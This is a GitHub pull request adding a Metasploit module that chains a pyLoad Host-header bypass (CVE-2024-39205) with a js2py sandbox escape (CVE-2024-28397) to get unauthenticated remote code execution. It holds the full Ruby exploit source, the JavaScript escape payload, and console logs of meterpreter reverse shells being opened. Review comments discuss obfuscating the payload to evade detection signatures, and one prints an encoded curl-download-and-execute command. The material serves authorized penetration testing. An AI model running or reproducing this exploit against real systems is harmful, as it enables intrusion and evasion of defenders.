Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Pyload RCE (CVE-2024-39205) with js2py sandbox escape (CVE-2024-28397) #19640

Merged
merged 5 commits into from
Nov 15, 2024
Merged

Pyload RCE (CVE-2024-39205) with js2py sandbox escape (CVE-2024-28397) #19640

Show file tree
Hide file tree
Changes from 3 commits
Commits
Show all changes
5 commits
Select commit Hold shift + click to select a range
d2ef3cb
Pyload RCE (CVE-2024-39205) with js2py sandbox escape (CVE-2024-28397)
jheysel-r7 Nov 13, 2024
497ce5e
Linting and Rex::RandomIdentifier update
jheysel-r7 Nov 13, 2024
2ba8a6c
Responded to comments
jheysel-r7 Nov 14, 2024
4e1f333
Ofuscation and Gemfile update
jheysel-r7 Nov 14, 2024
92e42a6
Rubocop
jheysel-r7 Nov 14, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
147 changes: 147 additions & 0 deletions documentation/modules/exploit/linux/http/pyload_js2py_cve_2024_39205.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,147 @@
## Vulnerable Application
CVE-2024-28397 is sandbox escape in js2py (<=0.74) which is a popular python package that can evaluate
javascript code inside a python interpreter. The vulnerability allows for an attacker to obtain a reference
to a python object in the js2py environment enabling them to escape the sandbox, bypass pyimport restrictions
and execute arbitrary commands on the host. At the time of writing no patch has been released, version 0.74
is the latest version of js2py which was released Nov 6, 2022.

CVE-2024-39205 is an remote code execution vulnerability in Pyload (<=0.5.0b3.dev85) which is an open-source
download manager designed to automate file downloads from various online sources. Pyload is vulnerable because
it exposes the vulnerable js2py functionality mentioned above on the /flash/addcrypted2 API endpoint.
This endpoint was designed to only accept connections from localhost but by manipulating the HOST header we
can bypass this restriction in order to access the API to achieve unauth RCE.

## Verification Steps

1. Start a vulnerable instance of pyLoad using docker
2. Start msfconsole
3. Run: `use exploit/linux/http/pyload_js2py_cve_2024_39205`
4. Set the `RHOST`, `LHOST` `PAYLOAD` and payload associated options
5. Run: `run`

### Docker Setup

```
docker run -d \
--name=pyload-ng \
-e PUID=1000 \
-e PGID=1000 \
-e TZ=Etc/UTC \
-p 8000:8000 \
-p 9666:9666 \
--restart unless-stopped \
lscr.io/linuxserver/pyload-ng:version-0.5.0b3.dev85
```

## Scenarios
### ARCH_CMD PyLoad 0.5.0b3.dev85 (with js2py 0.74)
```
msf6 > use linux/http/pyload_js2py_cve_2024_39205
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > options

Module options (exploit/linux/http/pyload_js2py_cve_2024_39205):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 9666 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host


When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME FTdcATmGGDpa no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Unix Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Sending stage (3045380 bytes) to 172.16.199.1
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:56080) at 2024-11-12 15:47:19 -0800

meterpreter > getruid
[-] Unknown command: getruid. Did you mean getuid? Run the help command for more details.
meterpreter > getuid
Server username: abc
meterpreter > sysinfo
Computer : 172.17.0.2
OS : (Linux 6.10.11-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```

### ARCH_X64 PyLoad 0.5.0b3.dev85 (with js2py 0.74)
```
msf6 > use linux/http/pyload_js2py_cve_2024_39205
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set target 1
target => 1
msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Sending stage (3045380 bytes) to 172.16.199.1
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.1:56088) at 2024-11-12 15:48:42 -0800
[*] Command Stager progress - 100.00% done (823/823 bytes)

meterpreter > getuid
Server username: abc
meterpreter > sysinfo
Computer : 172.17.0.2
OS : (Linux 6.10.11-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
171 changes: 171 additions & 0 deletions modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,171 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/stopwatch'

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Pyload RCE (CVE-2024-39205) with js2py sandbox escape (CVE-2024-28397)',
'Description' => %q{
CVE-2024-28397 is sandbox escape in js2py (<=0.74) which is a popular python package that can evaluate
javascript code inside a python interpreter. The vulnerability allows for an attacker to obtain a reference
to a python object in the js2py environment enabling them to escape the sandbox, bypass pyimport restrictions
and execute arbitrary commands on the host. At the time of writing no patch has been released, version 0.74
is the latest version of js2py which was released Nov 6, 2022.

CVE-2024-39205 is an remote code execution vulnerability in Pyload (<=0.5.0b3.dev85) which is an open-source
download manager designed to automate file downloads from various online sources. Pyload is vulnerable because
it exposes the vulnerable js2py functionality mentioned above on the /flash/addcrypted2 API endpoint.
This endpoint was designed to only accept connections from localhost but by manipulating the HOST header we
can bypass this restriction in order to access the API to achieve unauth RCE.
},
'Author' => [
'Marven11', # PoC
'Spencer McIntyre', # Previous pyLoad module which this is based on
'jheysel-r7' # Metasploit module
],
'References' => [
[ 'CVE', '2024-39205' ],
[ 'CVE', '2024-28397' ],
[ 'URL', 'https://github.com/Marven11/CVE-2024-39205-Pyload-RCE' ],
[ 'URL', 'https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g' ],
[ 'URL', 'https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape' ],
],
'DisclosureDate' => '2024-10-28',
'License' => MSF_LICENSE,
'Platform' => %w[unix linux],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
jheysel-r7 marked this conversation as resolved.
Show resolved Hide resolved
'Privileged' => true,
'Targets' => [
[
'Unix Command',
{
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD,
'Type' => :unix_cmd
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper
}
],
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

register_options([
Opt::RPORT(9666),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end

def check
sleep_time = rand(5..10)

_, elapsed_time = Rex::Stopwatch.elapsed_time do
execute_command("sleep #{sleep_time}")
end

vprint_status("Elapsed time: #{elapsed_time} seconds")

unless elapsed_time > sleep_time
return CheckCode::Safe('Failed to test command injection.')
end

CheckCode::Vulnerable('Successfully tested command injection.')
rescue Msf::Exploit::Failed
return CheckCode::Safe('Failed to test command injection.')
end

def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

case target['Type']
when :unix_cmd
if execute_command(payload.encoded)
print_good("Successfully executed command: #{payload.encoded}")
end
when :linux_dropper
execute_cmdstager
end
end

def javascript_payload(cmd)
js_vars = Rex::RandomIdentifier::Generator.new({ language: :javascript })

<<~EOS
let #{js_vars[:command]} = "#{cmd}"
smcintyre-r7 marked this conversation as resolved.
Show resolved Hide resolved
let #{js_vars[:hacked]}, #{js_vars[:bymarve]}, #{js_vars[:n11]}
let #{js_vars[:getattr]}, #{js_vars[:obj]}

#{js_vars[:hacked]} = Object.getOwnPropertyNames({})
#{js_vars[:bymarve]} = #{js_vars[:hacked]}.__getattribute__
#{js_vars[:n11]} = #{js_vars[:bymarve]}("__getattribute__")
#{js_vars[:obj]} = #{js_vars[:n11]}("__class__").__base__
#{js_vars[:getattr]} = #{js_vars[:obj]}.__getattribute__

function #{js_vars[:findpopen]}(#{js_vars[:o]}) {
let #{js_vars[:result]};
for(let #{js_vars[:i]} in #{js_vars[:o]}.__subclasses__()) {
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It's cool that we're obfuscating the variable names - but if I were writing fingerprints for this - I'd just have a simple check for __subclasses__ to detect issues

Maybe this should be obfuscated too?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I don't know if our :Rex::Exploitation::ObfuscateJS handles this or not

Copy link
Contributor

@adfoster-r7 adfoster-r7 Nov 14, 2024
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Might have to swap out things like let for var for it to work, as I'm not sure how much modern syntax it supports

Likewise for (var .. in ..) {

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This had crossed my mind but I wasn't exactly sure how I would have done it. I appreciate you bringing this up!

This is the javascript payload now after obfuscation:

let wTp5 = unescape("%63" + "%75%72%6c" + "%20%2d%73%6f%20%2e%2f%45%55%6a%68%78" + "%41%41%42%20%68%74%74%70%3a" + "%2f%2f%31%37%32%2e%31%36%2e%31%39%39%2e%31" + "%3a%38%30%38%30" + "%2f%4f%68%66%74%56%72%31%78%55%59%33%42%68%39%6b%75%51%47%41%61%35" + "%51%3b%20" + "%63" + "%68%6d%6f%64%20%2b%78%20%2e%2f%45%55%6a%68%78%41%41%42%3b" + "%20%2e%2f%45%55" + "%6a%68%78%41%41%42%20%26")
let f_Rzzxu281z, yUgI0ddexQ, m4ER
let wVO7GO4q, o_2Ldv

gReB1YKPZs = String.fromCharCode(  0x5f, 0x5f, 98, 97, 0163, 0x65, 95, 95 )
qU1jrx = String.fromCharCode(  0137, 0x5f, 0x67, 101, 0x74, 97, 116, 0x74, 114, 0151, 0142, 117, 0164, 0x65, 0x5f, 95 )
f_Rzzxu281z = Object.getOwnPropertyNames({})
yUgI0ddexQ = f_Rzzxu281z[qU1jrx]
m4ER = yUgI0ddexQ(String.fromCharCode(  0x5f, 0137, 0147, 101, 116, 97, 0x74, 0x74, 114, 105, 0x62, 0165, 0x74, 101, 0137, 0x5f ))
o_2Ldv = m4ER(String.fromCharCode(  0x5f, 0x5f, 0143, 0x6c, 0141, 0x73, 0x73, 0137, 0x5f ))[gReB1YKPZs]
wVO7GO4q = o_2Ldv[qU1jrx]
nkBtv8zF = unescape("%5f%5f%73%75%62%63%6c%61%73%73%65%73%5f%5f");

function ui3v1i2oj(bwPwuomAR9) {
    let lzDlv;
    for(let iKsEvSRGdi in bwPwuomAR9[nkBtv8zF]()) {
        let wuidH4d = bwPwuomAR9[nkBtv8zF]()[iKsEvSRGdi]
        if(wuidH4d.__module__ == unescape("%73%75%62%70%72%6f%63%65%73%73") && wuidH4d.__name__ == String.fromCharCode(  80, 0157, 0x70, 101, 0x6e )) {
            return wuidH4d
        }
        if(wuidH4d.__name__ != String.fromCharCode(  0164, 121, 0x70, 0145 ) && (lzDlv = ui3v1i2oj(wuidH4d))) {
            return lzDlv
        }
    }
}

m4ER = ui3v1i2oj(o_2Ldv)(wTp5, -1, null, -1, -1, -1, null, null, true).communicate()

I was playing with some of the other options but found just using the opts = { "Strings" => true } with dynamic method calls seemed to be the easiest way of doing things:

#{js_vars[:sub_class]} = '__subclasses__';
...
for(let #{js_vars[:i]} in #{js_vars[:o]}[#{js_vars[:sub_class]}]()) {

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Not a blocker; Just a bit of final golfing 🏌️

Since you can access object attributes with two notations object.attribute or object['attribute']. I believe if you swap to the latter syntax of __module__ or __name__ the full payload would be obfuscated fully without any strings that would be easy to match

let #{js_vars[:item]} = #{js_vars[:o]}.__subclasses__()[#{js_vars[:i]}]
if(#{js_vars[:item]}.__module__ == "subprocess" && #{js_vars[:item]}.__name__ == "Popen") {
return #{js_vars[:item]}
}
if(#{js_vars[:item]}.__name__ != "type" && (#{js_vars[:result]} = #{js_vars[:findpopen]}(#{js_vars[:item]}))) {
return #{js_vars[:result]}
}
}
}

#{js_vars[:n11]} = #{js_vars[:findpopen]}(#{js_vars[:obj]})(#{js_vars[:command]}, -1, null, -1, -1, -1, null, null, true).communicate()
EOS
end

def execute_command(cmd, _opts = {})
cmd.gsub!(/\\/, '\\\\\\\\')
cmd.gsub!(/"/, '\"')
vprint_status("Executing command: #{cmd}")
crypted_b64 = Rex::Text.encode_base64(rand(4))

res = send_request_cgi(
'method' => 'POST',
'headers' => {
'Host' => "127.0.0.1:#{datastore['RPORT']}"
},
'uri' => normalize_uri(target_uri.path, 'flash', 'addcrypted2'),
'vars_post' => {
'crypted' => crypted_b64,
'jk' => javascript_payload(cmd)
}
)

# The command will either cause the response to timeout or return a 500
return if res.nil?
return if res.code == 500 && res.get_xml_document.xpath('//title').text == 'Sorry, something went wrong... :('

fail_with(Failure::UnexpectedReply, "The HTTP server replied with a status of #{res.code}")
end

end